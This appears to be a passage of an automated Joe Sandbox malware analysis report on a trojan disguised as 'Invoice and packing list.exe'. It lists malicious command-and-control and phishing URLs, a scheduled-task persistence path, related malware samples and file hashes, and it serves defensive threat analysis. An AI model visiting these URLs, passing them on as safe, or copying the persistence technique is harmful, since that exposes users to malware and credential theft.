http://www.ndogaming.online	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/www.inggraphic.pro	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ive-neurozoom.storeReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itiz.xyzReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aja168e.live/a03d/www.kkkk.shop	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.enelog.xyzReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duxrib.xyz/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kkkk.shop/a03d/www.ndogaming.online	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gmgslzdc.sbs/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.eepvid.xyz/a03d/www.gmgslzdc.sbs	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oftware-download-92806.bond	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avid-hildebrand.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gmgslzdc.sbsReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.otelhafnia.info/a03d/www.argloscaremedia.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.avid-hildebrand.infoReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.eepvid.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 0000000A.00000003.3095507366.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4500945096.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2066553176.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoice and packing list.exe, 00000000.00000002.2064262392.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, utlAHqvw.exe, 0000000B.00000002.2097300869.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.otelhafnia.info/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.argloscaremedia.infoReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ndogaming.online/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oftware-download-92806.bond/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.otelhafnia.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 0000000A.00000000.2056890977.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.argloscaremedia.info/a03d/	explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.avid-hildebrand.info/a03d/www.aja168e.live	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inggraphic.pro/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.itiz.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itiz.xyz/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.yselection.xyz/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.itiz.xyz/a03d/www.duxrib.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.aja168e.live	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kkkk.shop	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.aportsystems.storeReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oftware-download-92806.bond/a03d/www.enelog.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.inggraphic.proReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ive-neurozoom.store/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.inggraphic.pro	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.eepvid.xyzReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yselection.xyzReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000000A.00000003.3096374174.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4494846370.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3095073919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.duxrib.xyz/a03d/www.otelhafnia.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.enelog.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aja168e.live/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ive-neurozoom.store	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 0000000A.00000003.3096506501.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2046314604.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kkkk.shop/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.duxrib.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.inggraphic.pro/a03d/www.avid-hildebrand.info	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/	explorer.exe, 0000000A.00000002.4492874400.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.yselection.xyz/a03d/www.eepvid.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.v	explorer.exe, 0000000A.00000002.4482316176.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2038920370.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ndogaming.online/a03d/www.itiz.xyz	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.oftware-download-92806.bondReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.eepvid.xyz/a03d/	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kkkk.shopReferer:	explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590095
Start date and time:	2025-01-13 15:26:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Invoice and packing list.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@30/15@12/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 259
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56, 199.232.210.172, 192.229.221.95, 20.242.39.171, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:26:55	API Interceptor	1x Sleep call for process: Invoice and packing list.exe modified
09:26:57	API Interceptor	21x Sleep call for process: powershell.exe modified
09:27:00	API Interceptor	1x Sleep call for process: utlAHqvw.exe modified
09:27:00	API Interceptor	6654193x Sleep call for process: explorer.exe modified
09:27:42	API Interceptor	5742029x Sleep call for process: NETSTAT.EXE modified
15:26:57	Task Scheduler	Run new task: utlAHqvw path: C:\Users\user\AppData\Roaming\utlAHqvw.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse	13.107.246.45
	Cardfactory Executed Agreement DocsID- Sign & Review..eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://www.google.ca/url?subgn1=https://www.fordbeckerandgutierrez.com&SQ=WA&SQ=F5&SQ=R7&TA=W4&SQ=L6&q=%2561%256d%2570%2F%2573%256D%2569%2568%256B%2538%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%256A%2576%2561%256E%256E%2561%2574%2574%2565%256E%2540%2561%2572%2572%256F%2577%2562%2561%256E%256B%252E%2563%256F%256D&opdg=ejM&cFQ=QXo&STA=MHY	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	bridgenet.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	13.107.246.45
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://sites.google.com/view/01-25sharepoint/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	stsvc.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	13.107.246.45
bg.microsoft.map.fastly.net	AstralprivateDLL.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse	199.232.210.172
	documents.exe	Get hash	malicious	Remcos	Browse	199.232.210.172
	YYYY-NNN AUDIT DETAIL REPORT .docx	Get hash	malicious	Unknown	Browse	199.232.210.172
	1972921391166218927.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	29522576223272839.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	1329220172182926612.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	29112223682907312977.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	179861427815317256.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	16910148382611315301.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	tesr.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	192.229.221.95
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://satelite.nv-ec.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://support.te-wt.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.flndmy.er-xu.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.support.ue-vt.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.lforgot.xw-er.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://support.wt-nx.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.maps.tv-wt.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	192.229.221.95

Process:	C:\Users\user\Desktop\Invoice and packing list.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\utlAHqvw.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\utlAHqvw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugePu/ZPUyus:fLHxvIIwLgZ2KRHWLOugYs
MD5:	B01D320A5E00F6F44E3AD8CA06E3CD8C
SHA1:	5240EE0491CBB780ABEA523AC3A0B6434A6A4E6D
SHA-256:	4D3A7366CCBA6FFEA6A0B01F2609F414390C0A7768F348BFE658F0BE477500BB
SHA-512:	9BBED844058A91A68935D7A29CD111537E8A28B5FCE31984929A330100E09156E664410DB1C9E361D3C045A11BC7171C001466455F7BB57C1EF7E1E70E79B918
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hkuw13k.xqt.ps1

